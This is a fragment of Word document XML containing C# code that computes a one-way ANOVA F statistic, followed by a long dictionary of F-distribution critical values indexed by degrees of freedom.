      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17555DC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40FC25D0" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24437A13"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obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEF8C1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    SS += (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>) * (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289D364" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F5D8C"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ni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34A2DE"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avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>) * (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">) * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>ni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775904C6"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2D190FE0"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obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>) * (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582C63D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FBDF09"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SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8440B"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SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> / df;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4749DD" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            F = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E98478" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718BB99F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            Dictionary&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">, double&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Ftable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new Dictionary&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, double</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>&gt;(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185CF449" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114612C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>region</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="45E0A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 161.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569452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 199.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13281F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3), 215.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05555A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4), 224.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368BB0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 230.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280474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6), 234.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE4BC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8), 238.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1FCF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2), 243.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7643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6), 246.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18B1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4), 249.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305DF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0), 251.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3BA637"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 51), 254.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6444DA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B233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 18.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C88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 19.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B6F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3), 19.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7413A2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4), 19.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3053D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 19.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17A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6), 19.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524AD6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8), 19.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1BB3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2), 19.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB85B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6), 19.43},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496ED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4), 19.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2465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0), 19.47},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38656E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1), 19.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2643CE0B" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12443D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 10.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1CEB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 9.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D93AD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3), 9.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579A6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4), 9.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F46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 9.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287FFD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6), 8.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513041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8), 8.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434EB0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2), 8.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE9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6), 8.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC961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4), 8.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B2B0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0), 8.58},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33CB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1), 8.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51111E32" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C044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 7.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230053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 6.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9279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3), 6.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34579A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4), 6.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBD79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 6.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E743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6), 6.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0FB2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8), 6.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D49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2), 5.91},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160050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6), 5.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523E5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4), 5.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2ED5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0), 5.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CAC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1), 5.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564895AA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A286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 6.61},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDA5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 5.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB46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3), 5.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280109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4), 5.19},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3139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 5.05},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04732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6), 4.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC9F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8), 4.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55035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2), 4.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5557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6), 4.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C36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4), 4.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C865B1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 50), 4.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49619B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1), 4.36},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4090F035" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135C036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 5.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBA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 5.14},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD5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3), 4.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1602A9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4), 4.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3057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 4.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C900C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6), 4.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D495E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8), 4.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C708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2), 4.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8D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6), 3.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310692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4), 3.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6425CE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0), 3.75},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980825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1), 3.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72140895" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059A2D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 5.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E173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 4.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121721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3), 4.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C143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4), 4.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79508C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 3.97},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2228E5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6), 3.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E721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8), 3.73},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B4A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2), 3.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F292B8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6), 3.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79771C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4), 3.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C9B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0), 3.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380129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1), 3.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9E650" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F551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 5.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054724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 4.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156199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3), 4.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C48D7C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4), 3.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718B931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 3.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129695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6), 3.58},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DEEA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8), 3.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E87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2), 3.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483189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6), 3.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82AED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4), 3.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43793F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0), 3.02},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72A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1), 2.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC167F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4627E6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 5.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCA0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2), 4.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766622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3), 3.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47548C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4), 3.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A742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 3.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A4FE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6), 3.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF3E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8), 3.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD46D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2), 3.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737CB4D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6), 2.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12324911"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9, 24), 2.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E29C4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0), 2.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13530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1), 2.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434EFDE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE309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 4.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E651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 4.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C190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3), 3.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBEB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4), 3.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411530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 3.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F0FE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6), 3.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6DBE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8), 3.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E5F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2), 2.91},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D02F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6), 2.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C529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4), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE8EE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0), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301CEE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1), 2.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9D305" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B21618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 4.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA825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 3.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3EE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3), 3.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF27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4), 3.36},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C984C9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 3.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BFA6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6), 3.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386584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8), 2.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989D6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2), 2.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F9AC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6), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305308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4), 2.61},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C815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0), 2.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E4B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1), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43A4AC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601122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 4.75},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7363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 3.88},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE88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3), 3.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5819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4), 3.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE966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 3.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D74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6), 3.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5540B07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8), 2.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD920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2), 2.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C96F7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6), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A65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4), 2.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57895E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0), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C075C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1), 2.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DEBA4" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F5C6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 4.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC7210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 3.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A8A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3), 3.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B97C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4), 3.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5C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 3.02},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC34F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6), 2.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD961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8), 2.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7AE6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2), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF9DFB"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3, 16), 2.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC8E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4), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8B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0), 2.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017628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1), 2.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF66321" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0345B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 4.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2428350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 3.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586DA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3), 3.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117818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4), 3.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EB26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 2.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E64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6), 2.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BB2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8), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398089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2), 2.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132DA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6), 2.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E855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4), 2.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412E89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0), 2.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314CC3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1), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904BC13" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B01D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 4.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00671B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 3.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D6D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3), 3.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48741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4), 3.06},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DAB5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 2.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6970A9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6), 2.79},</w:t>
      </w:r>
    </w:p>
